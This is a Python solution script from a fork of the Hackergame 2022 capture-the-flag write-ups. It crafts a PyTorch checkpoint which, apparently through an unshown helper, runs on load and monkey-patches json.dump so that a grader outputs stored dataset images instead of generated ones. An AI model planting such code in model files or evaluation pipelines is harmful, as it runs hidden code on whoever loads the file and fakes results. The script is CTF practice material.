forked from USTC-Hackergame/hackergame2022-writeups
-
Notifications
You must be signed in to change notification settings - Fork 0
/
patch.py
48 lines (33 loc) · 1.18 KB
/
patch.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import torch
import patch_torch_save
from models import SimpleGenerativeModel
def replaceWithDataset():
    """Replace ``json.dump`` with a hook that emits the stored dataset images.

    The genuine ``json.dump`` is saved in the module-level global
    ``jsondump`` so the hook can still serialise with it.  Every import is
    done locally, so the body does not depend on names from the enclosing
    module.
    NOTE(review): presumably this is because ``patch_torch_save`` ships the
    source of this function elsewhere - confirm against that module.  For the
    same reason the body avoids ``return`` and keeps ``global`` rather than a
    closure.

    Calling this again while the hook is already installed changes nothing.
    Re-installing would make ``jsondump`` point at the hook itself, and the
    next ``json.dump`` call would recurse without end.
    """
    import json
    def fun(a, b):
        """Stand-in for ``json.dump(obj, fp)``; both arguments are ignored.

        Loads ``dataset/pixels_10.pt``, encodes its first ten entries as
        base64 PNG strings, writes them to ``/tmp/result.json`` under the key
        ``gen_imgs_b64`` and prints the written file.
        """
        import io
        import base64
        import torch
        import matplotlib.image
        predictions = torch.load("dataset/pixels_10.pt", map_location="cpu")
        n_samples = 10
        gen_imgs = []
        for i in range(n_samples):
            out_io = io.BytesIO()
            matplotlib.image.imsave(out_io, predictions[i].numpy(), format="png")
            gen_imgs.append(base64.b64encode(out_io.getvalue()).decode())
        # Close the writer before reading back, so the data is flushed
        # without relying on garbage collection of an anonymous handle.
        with open("/tmp/result.json", "w") as result_file:
            jsondump({"gen_imgs_b64": gen_imgs}, result_file)
        with open("/tmp/result.json", "r") as result_file:
            print(result_file.read())
    global jsondump
    # Install only once: the marker attribute identifies an existing hook.
    if not getattr(json.dump, "_replaces_with_dataset", False):
        fun._replaces_with_dataset = True
        jsondump = json.dump
        json.dump = fun
# Obtain a save function from patch_torch_save, handing it replaceWithDataset.
# NOTE(review): what patch_save_function does with the callable is defined in
# patch_torch_save, not here - confirm there.
patched_save_function = patch_torch_save.patch_save_function(replaceWithDataset)

# Constructor arguments for SimpleGenerativeModel.
n_tags, dim = 63, 8
img_shape = (64, 64, 3)

# Build the model, then restore its weights from the existing checkpoint,
# mapping every tensor to the CPU.
model = SimpleGenerativeModel(n_tags=n_tags, dim=dim, img_shape=img_shape)
checkpoint_state = torch.load("checkpoint/model.pt", map_location="cpu")
model.load_state_dict(checkpoint_state)

# Write the model's state dict to a second checkpoint file through the
# save function obtained above.
patched_save_function(model.state_dict(), "checkpoint/model2.pt")